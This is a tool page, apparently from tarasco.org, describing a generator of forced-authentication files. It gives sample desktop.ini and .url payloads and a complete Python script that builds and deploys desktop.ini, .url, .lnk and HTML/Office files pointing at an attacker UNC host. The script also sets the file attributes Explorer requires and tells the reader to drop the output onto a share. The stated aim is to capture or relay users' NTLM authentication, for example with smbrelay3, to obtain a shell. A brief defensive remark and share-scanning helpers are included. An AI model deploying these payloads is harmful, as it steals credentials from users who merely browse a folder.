Introduction:
Hacking is not always about breaking systems with remote code execution vulnerabilities.
This time we are going to use a different approach.
Imagine that you are connected to a domain network and somehow you are able to
deliver files into that network, for example by writing files to a heavily used file
server, sending documents by email to network users or running MITM attacks against
HTTP traffic. If you can do that, you only need a way to force the network computers
to connect to a host of your choice.
Our network payload generation tool provides new ways to attack those networks: it
deploys several kinds of content that force the remote computers to connect to the
designated target and authenticate (NTLM challenge/response over SMB or HTTP) on
behalf of the logged-on user, without any action from that user beyond browsing a
folder or opening a document. At that point there are lots of ways to exploit those
systems, such as sniffing the authentication exchange, attacking a pipe created by
the namedpipes tool or relaying it with the new smbrelay3.

Our payload generation tool is able to generate and deploy several kinds of files:
desktop.ini, .lnk files, .url files and HTML/Office documents with embedded links to
a remote resource. Those embedded links are handled automatically by Windows Explorer
(explorer.exe) and by the application that renders the document, and there is no
per-user setting that disables it; the practical defence is to block outbound SMB
(TCP 139/445) at the network perimeter and to restrict outgoing NTLM authentication
to untrusted servers.
Details:
The -t parameter specifies what kind of payload is going to be used. Examples:
* d1: IconFile - desktop.ini: The IconFile entry points to a network
resource. When you browse a folder and a desktop.ini with this entry is stored in
a subfolder, explorer.exe automatically connects to the network share and sends the
user's credentials while rendering the subfolder's icon.
* d2: LocalizedResourceName - desktop.ini: The LocalizedResourceName entry
points to a network resource. Works for both the folder and its subfolders.
* d3: InfoTip - desktop.ini: The InfoTip entry points to a network resource.
Works when the folder is selected (the tooltip is resolved).
* d4: desktop.ini - desktop.ini: The desktop.ini entry points to a network
resource. Works when entering the folder.
* d0: All - desktop.ini: Deploy all known desktop.ini payloads at once to
ensure that the remote target is engaged whichever way the folder is touched.
Note that Explorer only honours a desktop.ini when the containing folder carries the
ReadOnly or System attribute and the file itself is marked Hidden and System.
; sample produced by -t d0 (all desktop.ini payloads); host is the capturing target
[.ShellClassInfo]
InfoTip=Proof of concept for desktop redirect - http://www.tarasco.org
desktop.ini=@\\host\admin$,-1
InfoTip=@\\host\admin$,-1
LocalizedResourceName=@\\host\admin$,-1
IconFile=\\host\admin$
IconIndex=-666
ConfirmFileOp=0
* u: url file: Deploy a .url file, which behaves like an .lnk file. The IconFile=
entry points to a network service and is resolved as soon as Explorer draws the icon.
[DEFAULT]
BASEURL=http://www.tarasco.org
[InternetShortcut]
URL=http://www.tarasco.org
Modified=203BF2701D7FC60120
IconIndex=3
IconFile=\\host\admin$
* l: lnk file: Deploy a .lnk file. This is an empty built-in .lnk file (no target)
with the HasIconLocation flag (0x40 in the LinkFlags field, the "custom icon" flag of
the shortcut format) set and an ICON_LOCATION string pointing to a network service.
* h: html file: Deploy a .html file with a LINK REL="stylesheet" element whose
href points to a network service.
* o: office file: Deploy a .pps file containing the same LINK REL="stylesheet"
HTML code pointing to a network service. Office opens the HTML regardless of the
extension, so you can rename the file to .doc, .ppt, .pps, .xls, ...
The -p parameter is optional and points to the directory where the payload
is going to be saved.
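To show how small these payloads are, here is an added example (written for this page, not the tarasco.org tool's own code) that builds the desktop.ini, .url, HTML/Office and .lnk variants for a UNC path, sets the attributes Explorer requires for desktop.ini, and parses a .lnk back to confirm where its icon points. The capture host, file names and helper names are this example's assumptions; the .lnk layout follows MS-SHLLINK, and whether Explorer resolves a link this minimal is likewise an assumption rather than something the page states.

```python
"""Added example, not the tarasco.org tool's code: build the file-based
payloads the page lists so Windows resolves a UNC path (and sends the
logged-on user's NTLM authentication), and parse a .lnk back to see where
its icon points.  UNC host, file names and helper names are assumptions."""
import os
import re
import struct
import subprocess
import sys
from typing import Optional

UNC = r"\\capture-host\share"   # assumed: the host running the SMB listener

# MS-SHLLINK 2.1.1 LinkFlags bits used here (HasIconLocation is 0x40, not 0x80)
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-..-46}
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")


def desktop_ini(unc: str = UNC) -> str:
    """All four desktop.ini triggers (the page's d0): IconFile fires when the
    parent folder is listed, the @res,-1 entries when it is selected/entered."""
    return "\r\n".join(["[.ShellClassInfo]", f"IconFile={unc}", "IconIndex=-666",
                        f"InfoTip=@{unc},-1", f"LocalizedResourceName=@{unc},-1",
                        f"desktop.ini=@{unc},-1", "ConfirmFileOp=0", ""])


def url_file(unc: str = UNC, url: str = "http://example.invalid/") -> str:
    """InternetShortcut whose IconFile is a UNC path."""
    return "\r\n".join(["[InternetShortcut]", f"URL={url}", "IconIndex=3",
                        f"IconFile={unc}", ""])


def html_file(unc: str = UNC) -> str:
    """Stylesheet LINK on a UNC path; saved as .doc/.pps/.xls Office opens it too."""
    return (f'<html><head><link rel="stylesheet" href="{unc}\\style.css">'
            "</head><body>report</body></html>\n")


def lnk_file(unc: str = UNC, icon_index: int = 0, unicode: bool = True) -> bytes:
    """Minimal shell link: no target IDList, no LinkInfo, only ICON_LOCATION
    (76-byte ShellLinkHeader followed directly by StringData)."""
    flags = HAS_ICON_LOCATION | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags,
                         0,            # FileAttributes
                         0, 0, 0,      # Creation/Access/Write FILETIME
                         0,            # FileSize
                         icon_index,   # IconIndex
                         1,            # ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)   # HotKey, Reserved1..3
    text = unc.encode("utf-16-le" if unicode else "cp1252")
    return header + struct.pack("<H", len(unc)) + text


def lnk_icon_location(data: bytes) -> Optional[str]:
    """Skip optional IDList/LinkInfo, walk StringData in spec order and return
    ICON_LOCATION (None when the HasIconLocation flag is clear)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]   # IDListSize + list
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]       # LinkInfoSize
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit in (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR,
                HAS_ARGUMENTS, HAS_ICON_LOCATION):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]      # CountCharacters
        value = data[off + 2:off + 2 + count * width].decode(enc)
        off += 2 + count * width
        if bit == HAS_ICON_LOCATION:
            return value
    return None


def unc_hosts(text: str) -> set:
    """Hosts named by UNC paths in a text payload; a defender walking a share
    can compare these against an allowlist to spot planted files."""
    return set(UNC_RE.findall(text))


def deploy_desktop_ini(folder: str, unc: str = UNC) -> str:
    """Explorer only honours desktop.ini when the folder is ReadOnly or System
    and the file is Hidden+System, so set that with attrib on Windows."""
    os.makedirs(folder, exist_ok=True)
    path = os.path.join(folder, "desktop.ini")
    with open(path, "w", newline="") as fh:
        fh.write(desktop_ini(unc))
    if sys.platform == "win32":
        subprocess.run(["attrib", "+r", folder], check=True)
        subprocess.run(["attrib", "+s", "+h", path], check=True)
    return path


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else "payloads"
    deploy_desktop_ini(os.path.join(out, "sub"))
    for name, body in (("notes.url", url_file()), ("report.doc", html_file())):
        with open(os.path.join(out, name), "w", newline="") as fh:
            fh.write(body)
    with open(os.path.join(out, "shortcut.lnk"), "wb") as fh:
        fh.write(lnk_file())
```

Run it with an output directory as the only argument and drop that directory onto the share; the .lnk and .url files fire when Explorer draws their icons, the desktop.ini when the "sub" folder is listed, selected or entered, and the .doc when Office opens it. The same lnk_icon_location and unc_hosts helpers serve the defensive side: walking a file server for .lnk, .url, desktop.ini and HTML files that point at hosts outside the expected set is a cheap way to find payloads of this kind.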
You can use this tool to deploy payloads and attack a network pipe created by the
namedpipes tool, or to relay the resulting SMB or HTTP authentication to a designated
target and get a shell with smbrelay3.
You can browse the source code online.
Download (Windows executable + source code)